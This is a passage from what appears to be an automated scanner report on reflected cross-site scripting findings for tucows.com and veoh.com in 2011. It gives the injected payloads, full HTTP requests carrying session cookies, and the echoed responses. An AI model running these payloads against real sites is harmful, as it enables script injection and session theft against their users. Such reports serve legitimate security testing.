The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97844"-alert(1)-"e3ce1315cea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videoegg/ad.html97844"-alert(1)-"e3ce1315cea HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utmb=163973946; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/videoegg/ad.html97844"-alert(1)-"e3ce1315cea";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.393. http://www.veoh.com/browse/videos/category/action_adventure [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d235"><img%20src%3da%20onerror%3dalert(1)>9e252f7871e was submitted in the REST URL parameter 4. This input was echoed as 9d235"><img src=a onerror=alert(1)>9e252f7871e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure9d235"><img%20src%3da%20onerror%3dalert(1)>9e252f7871e HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:46 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=59
Content-Length: 57827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure9d235"><img src=a onerror=alert(1)>9e252f7871e/sort/most viewed" selected="selected">
...[SNIP]...

3.394. http://www.veoh.com/browse/videos/category/action_adventure [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4b0c<img%20src%3da%20onerror%3dalert(1)>88040cf1d82 was submitted in the REST URL parameter 4. This input was echoed as f4b0c<img src=a onerror=alert(1)>88040cf1d82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventuref4b0c<img%20src%3da%20onerror%3dalert(1)>88040cf1d82 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:50 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 57783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuref4b0c<img src=a onerror=alert(1)>88040cf1d82"}</textarea>
...[SNIP]...

3.395. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e6c"><img%20src%3da%20onerror%3dalert(1)>96f11e9dd34 was submitted in the REST URL parameter 4. This input was echoed as 71e6c"><img src=a onerror=alert(1)>96f11e9dd34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure71e6c"><img%20src%3da%20onerror%3dalert(1)>96f11e9dd34/watch/v18647177dJ8p2YBE HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=87
Content-Length: 77754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure71e6c"><img src=a onerror=alert(1)>96f11e9dd34/sort/most viewed" selected="selected">
...[SNIP]...

3.396. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8fa41<img%20src%3da%20onerror%3dalert(1)>55c9c937f22 was submitted in the REST URL parameter 4. This input was echoed as 8fa41<img src=a onerror=alert(1)>55c9c937f22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure8fa41<img%20src%3da%20onerror%3dalert(1)>55c9c937f22/watch/v18647177dJ8p2YBE HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=65
Content-Length: 77710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure8fa41<img src=a onerror=alert(1)>55c9c937f22"}</textarea>
...[SNIP]...

3.397. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfc58'%3bc01f25840e4 was submitted in the REST URL parameter 6. This input was echoed as cfc58';c01f25840e4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBEcfc58'%3bc01f25840e4 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:26 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=72
Content-Length: 94329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'd18561bc886031d73754768a00e1c177',
'v18647177dJ8p2YBEcfc58';c01f25840e4'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.398. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v189741093prNNZM5

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbdf3"><img%20src%3da%20onerror%3dalert(1)>42b09b361cc was submitted in the REST URL parameter 4. This input was echoed as fbdf3"><img src=a onerror=alert(1)>42b09b361cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurefbdf3"><img%20src%3da%20onerror%3dalert(1)>42b09b361cc/watch/v189741093prNNZM5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:16 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=43
Content-Length: 76768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventurefbdf3"><img src=a onerror=alert(1)>42b09b361cc/sort/most viewed" selected="selected">
...[SNIP]...

3.399. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v189741093prNNZM5

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8f48<img%20src%3da%20onerror%3dalert(1)>a3fbcd0230a was submitted in the REST URL parameter 4. This input was echoed as f8f48<img src=a onerror=alert(1)>a3fbcd0230a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventuref8f48<img%20src%3da%20onerror%3dalert(1)>a3fbcd0230a/watch/v189741093prNNZM5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:33 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=20
Content-Length: 76724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuref8f48<img src=a onerror=alert(1)>a3fbcd0230a"}</textarea>
...[SNIP]...

3.400. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v189741093prNNZM5

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22732'%3b900f2443f83 was submitted in the REST URL parameter 6. This input was echoed as 22732';900f2443f83 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v189741093prNNZM522732'%3b900f2443f83 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:44 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'aca1ab27744967658c549c7be43411a8',
'v189741093prNNZM522732';900f2443f83'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.401. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bef9b"><img%20src%3da%20onerror%3dalert(1)>63733810adb was submitted in the REST URL parameter 4. This input was echoed as bef9b"><img src=a onerror=alert(1)>63733810adb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurebef9b"><img%20src%3da%20onerror%3dalert(1)>63733810adb/watch/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:41 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 76451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventurebef9b"><img src=a onerror=alert(1)>63733810adb/sort/most viewed" selected="selected">
...[SNIP]...

3.402. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be275<img%20src%3da%20onerror%3dalert(1)>e6d8963fd9 was submitted in the REST URL parameter 4. This input was echoed as be275<img src=a onerror=alert(1)>e6d8963fd9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurebe275<img%20src%3da%20onerror%3dalert(1)>e6d8963fd9/watch/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 76397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurebe275<img src=a onerror=alert(1)>e6d8963fd9"}</textarea>
...[SNIP]...

3.403. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 6]  previous  next

Summary

